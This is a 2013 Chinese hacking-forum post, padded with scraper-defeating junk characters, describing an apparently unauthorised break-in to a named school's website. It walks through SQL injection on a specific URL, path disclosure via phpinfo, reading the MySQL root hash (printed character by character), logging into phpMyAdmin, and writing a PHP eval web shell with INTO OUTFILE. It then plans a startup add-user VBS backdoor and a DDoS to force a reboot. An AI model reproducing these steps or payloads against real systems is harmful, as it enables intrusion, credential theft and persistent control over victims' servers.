找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2849|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
; m1 B' B  u/ y2 j发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
; T2 d9 ?4 d# R# _5 f) O4 G1 Z1 U7 X0 b% K9 @
9 b/ J# u5 C% m

& d; b0 {4 t- g; ~$ c1 f常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 $ t; l+ ]- o6 p( J4 |; t- g

) }/ a4 N: P5 _& V那么想可以直接写入shell ,getshell有几个条件:4 Q$ u  j9 e+ p( X  F+ y! b
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
7 P9 {" H- v; s' W7 X; {4 o
' |- q5 i( Q6 ?5 V; y6 s) S7 h& F! K试着爆绝对路径:
) a, m+ H$ S5 m# [) `1./phpMyAdmin/index.php?lang[]=1  1 ^8 V1 J. X, N8 x9 E
2./phpMyAdmin/phpinfo.php  
! |8 c& `6 J. H9 B7 j8 R1 v3./load_file()  
7 ]/ `& W' U4 \" `4./phpmyadmin/themes/darkblue_orange/layout.inc.php    ?3 J$ ]5 R( N% S
5./phpmyadmin/libraries/select_lang.lib.php  - J  u' @! [  k* }- y: m; Z/ d2 ^3 \$ ^
6./phpmyadmin/libraries/lect_lang.lib.php  : D: B8 `. c  J
7./phpmyadmin/libraries/mcrypt.lib.php   
& @/ e/ \: f" E7 N6 z- k0 ~8./phpmyadmin/libraries/export/xls.php  
0 K- c. y/ E( b9 A
' @, L0 ?9 w0 G/ i均不行...........................8 z+ j- S3 H9 K
3 u0 ~% T- k, k8 b1 s: h* n
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php7 y$ l( C9 c0 @
9 F. R" d6 Q/ X% |: s  l
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ; u/ o! w. y. y" \- I4 n

9 j$ E7 k' `7 T( p. }  I( @% j默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败# W; q3 T# a3 T4 f* G; r
4 ?" f" f5 y# O8 Q* R6 ~
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........; Z. \! Q. a8 A' v

) j2 f) _8 G' E: o2 q想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ( A: z2 j0 X: f* e2 Q
2 U4 ]% m% z' |; |
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
1 X+ }3 y2 [/ {4 D% b  r4 }' g* g7 Z, a+ l7 ?
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD . w) {8 E5 A1 L' m. E7 K$ j5 l- A
$ d! K& V  a  }; u4 |3 V, C8 m
成功读到root密码:
6 g# M$ K& h0 K& j) F+ _; ~; C1 M0 K* G1 o' x. k5 j! ?% p5 N
17---- r(0072)! i- T& g  v" W0 _) Z1 B( ^0 K
18---- o(006f)% G: X: q0 x# B& l5 Z  w
19---- o(006f)
* P7 {7 S1 X; r. V& f20---- t(0074)) n& i5 B" k5 K: e; O$ r
21---- *(002a)
4 s  S7 t- V# u& A% s) R# X22---- 8(0038)
* V2 p# f' C0 ^7 W, A: U23---- 2(0032)
. v0 f8 s: w* E  M4 r7 P7 g24---- E(0045)! W7 a1 k2 V( c! j& D- q" t! X
25---- 1(0031)
% b( u' X& Q. e7 s  e26---- C(0043)
; }1 T5 @: Z9 v% R1 l27---- 5(0035)" L# T5 O" R# @  T" R) P
28---- 8(0038)+ X5 M9 ^1 E) J" Q' K9 l- i8 I
29---- 2(0032)
' T0 @; a6 _% \8 _30---- 8(0038)
- y. k3 y) Q* H( Y31---- A(0041)
/ h  q% f" g/ o' p32---- 9(0039)
+ m7 z, I/ n% b1 a1 F33---- B(0042)
" |: A7 m5 D1 m& ^! y& d# t34---- 5(0035)
/ [7 }0 t/ R5 M, m0 v35---- 4(0034)6 V% R) b% U2 S. G/ }
36---- 8(0038)
0 Q  k7 p) ^& S8 R37---- 6(0036)
9 d& U; ^' d- N6 _! g& }' s38---- 4(0034)" b/ g! t5 o6 r# B5 s' A1 D
39---- 9(0039)2 k2 E" D& i1 J: C1 i9 r9 G3 K
40---- 1(0031): ^1 _" P& C' o/ P) ~0 N
41---- 1(0031)! N* z' w1 Y# d
42---- 5(0035)
9 q* I: u$ c. H: Q) k43---- 3(0033)2 h; h, K# f  h: h& j! A7 R7 b# X
44---- 5(0035)9 E* S6 B4 [) L' r9 l0 G
45---- 9(0039)
5 t! z2 \! ~7 g  n: h46---- 8(0038)5 `4 d% Q) c& I+ i
47---- F(0046)
3 \! a# [/ @2 _48---- F(0046)
( A) G- N7 C9 m- ~) ^+ ]49---- 4(0034), |9 i& U( L$ F% t6 R, q* `
50---- F(0046)
7 R" u& g5 o" y6 T* w51---- 0(0030)3 k. m8 a% C+ g6 R4 V" J0 W) o
52---- 3(0033)
# i: X4 k: J1 I53---- 2(0032)
: O9 _* z9 k, ~& z2 B: H54---- A(0041)
* \2 l# w% C( N% x( I+ Z55---- 4(0034)
7 g7 W" z1 Q$ F, y56---- A(0041)5 K1 g4 n& X( ~: t! _
57---- B(0042)* a/ g$ P1 ^5 y* d  w" x+ g0 T) U
58---- *(0044)
( y" @. n6 u+ I% p9 T59---- *(0035)
  e' L. D5 T. M. F60---- *(0041)
; ?( S8 i$ ?" F61---- *0032)
+ F- u9 r) |0 |0 [3 f' T% ]% i! }/ O1 t0 w6 y* J6 h2 l- e8 }
解密后成功登陆phpmyamin
9 D& B6 X% |. E% x" A' q. `7 Q1 U! k                          - T3 G- Q) ~. L: y+ s8 n2 D
- Z5 X! v9 r8 ^& y$ a& x
                             % _" `& {" M# w& f2 Z! w& t; x
0 o  ]4 t7 G/ |+ ^9 t6 l( i
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 q  @. J. _: U0 }9 E! K: V) c
9 X. C( @/ n- {. ~$ u4 |6 i成功执行,拿下shell,菜刀连接:
, {- d( v8 i1 ~) ~( ?' Q0 I; q
  L6 o& O9 @; t服务器不支持asp,aspx,php提权无果...................7 E( ]1 e  C3 g

# s. O4 \& t: j* M8 E3 \但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
% Q+ u+ c8 o. x, P8 e
服务器上已经有个隐藏帐号了

4 G6 U& F: H/ L5 S( w$ T
别名     administrators
4 {5 f4 f  C; W5 z注释     管理员对计算机/域有不受限制的完全访问权
$ R$ k$ c0 V/ e; `0 G0 U3 Z8 ?& o3 L
成员

/ h: @. t; ~* K
-------------------------------------------------------------------------------
/ p' Q- Z) L$ O9 Jadmin* p3 z; |) V. `+ H; h4 ~
Administrator
2 G  c* T, p% ]# n4 h: g' u, g; {4 aslipper$' ^* ^  @0 z0 c
sqluser
* U4 t7 G8 @) ^) g命令成功完成。 + R8 J! J1 Y) d$ H; p: O
. w6 c( k: o" a! k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。. G( R6 H* m9 K3 W2 B
5 |: `" p+ y- k& N* Q  b
ddos服务器重启,不然就只能坐等服务器重启了...............................3 w& C1 J3 Z$ ], y* @- ]
# D( r5 r9 G; @- a, l, [$ d
      
- M1 B0 m& H) A: d' w9 e

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表